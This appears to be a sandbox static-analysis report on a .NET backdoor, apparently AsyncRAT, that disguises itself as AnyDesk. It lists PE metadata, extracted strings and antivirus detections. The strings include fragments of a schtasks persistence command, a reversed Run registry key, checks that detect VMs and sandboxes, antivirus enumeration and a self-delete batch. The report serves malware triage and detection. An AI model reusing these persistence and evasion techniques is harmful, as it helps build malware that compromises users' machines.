Static | ZeroBOX

PE Compile Time

2020-05-10 14:24:51

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000b0c4 0x0000b200 5.6294446854
.rsrc 0x0000e000 0x0000c630 0x0000c800 2.25747319837
.reloc 0x0001c000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0000e130 0x0000bd28 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_GROUP_ICON 0x00019e58 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x00019e6c 0x00000330 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0001a19c 0x00000493 LANG_NEUTRAL SUBLANG_NEUTRAL exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
MapNameToOID
get_FormatID
get_ASCII
System.IO
get_IV
set_IV
GenerateIV
value__
mscorlib
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
EndRead
BeginRead
Thread
jOtYzdZhIHpmad
VBiwfRrMqqEed
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
Replace
CreateInstance
VUnxLOXDBZde
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
JowAjnkBCxWmmie
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
CryptoConfig
jONLXWYalYkg
liVvBstWfRRlg
kzfxCiJXLytuavnlg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
dmywQQYdQOm
YbjEHczUhRzPm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
dyyajlwCgm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
NsxOluaklFxom
ICryptoTransform
ToBoolean
PRWLebVqMMFcn
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
ZLGgrdSBOlQsn
kjnuraKjsHo
TPCfOXqONo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
Microsoft.CSharp
System.Linq
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
TVZlnSxjJjr
YhRskSHJCPLNor
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
qURVDzRxFHMqr
PNmSKTswlqr
IntPtr
KZuqqmBMinRAs
OyZuzACHfEHs
XpwrgIIwMMHs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
vBpdBURRwnCPis
ICredentials
set_Credentials
Equals
yKvhQBCdls
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Concat
ImageFormat
get_AsFloat
set_AsFloat
foUZIDQljcbt
THGWPnjOFmCct
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
IAsyncResult
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
LWLfNNLTSot
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
GetForegroundWindow
set_CreateNoWindow
InitializeArray
ToArray
get_AsArray
MKFKuOWwgLHydy
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
rlPdwRdJusy
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
%AppData%
Regedit.exe
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
philandro Software GmbH
FileDescription
AnyDesk
FileVersion
6.0.9.0
InternalName
LegalCopyright
(C) 2020 philandro Software GmbH
LegalTrademarks
OriginalFilename
ProductName
AnyDesk
ProductVersion
6.0.9.0
Assembly Version
6.0.9.0
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
MicroWorld-eScan IL:Trojan.MSILZilla.1627
FireEye Generic.mg.06bae52519e72b26
CAT-QuickHeal Backdoor.MsilFC.S13564499
ALYac IL:Trojan.MSILZilla.1627
Cylance Unsafe
VIPRE Clean
AegisLab Clean
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 005678321 )
BitDefender IL:Trojan.MSILZilla.1627
K7GW Trojan ( 005678321 )
Cybereason malicious.519e72
Baidu Clean
Cyren W32/MSIL_Agent.IO.gen!Eldorado
Symantec Clean
ESET-NOD32 a variant of MSIL/Agent.CFQ
APEX Malicious
Avast Win32:DropperX-gen [Drp]
ClamAV Win.Packed.Razy-9625918-0
Kaspersky HEUR:Backdoor.MSIL.Crysan.gen
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
Ad-Aware IL:Trojan.MSILZilla.1627
Sophos ML/PE-A + Mal/Agent-AVM
Comodo Clean
F-Secure Clean
DrWeb Trojan.Siggen9.56514
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Fareit-FZT!06BAE52519E7
MaxSecure Clean
CMC Clean
Emsisoft IL:Trojan.MSILZilla.1627 (B)
Ikarus Trojan.MSIL.Agent
GData MSIL.Trojan.PSE.1DQ5TRK
Jiangmin Backdoor.MSIL.cxnh
Webroot Clean
Avira HEUR/AGEN.1121262
MAX malware (ai score=86)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Backdoor:MSIL/AsyncRat.AD!MTB
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.RL_Generic.R358277
Acronis Clean
McAfee Fareit-FZT!06BAE52519E7
TACHYON Clean
VBA32 Clean
Malwarebytes Generic.Trojan.Malicious.DDS
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_85%
Fortinet MSIL/CoinMiner.CFQ!tr
BitDefenderTheta Gen:NN.ZemsilF.34692.fm0@auZtksl
AVG Win32:DropperX-gen [Drp]
Paloalto Clean
CrowdStrike win/malicious_confidence_80% (D)
Qihoo-360 Clean
No IRMA results available.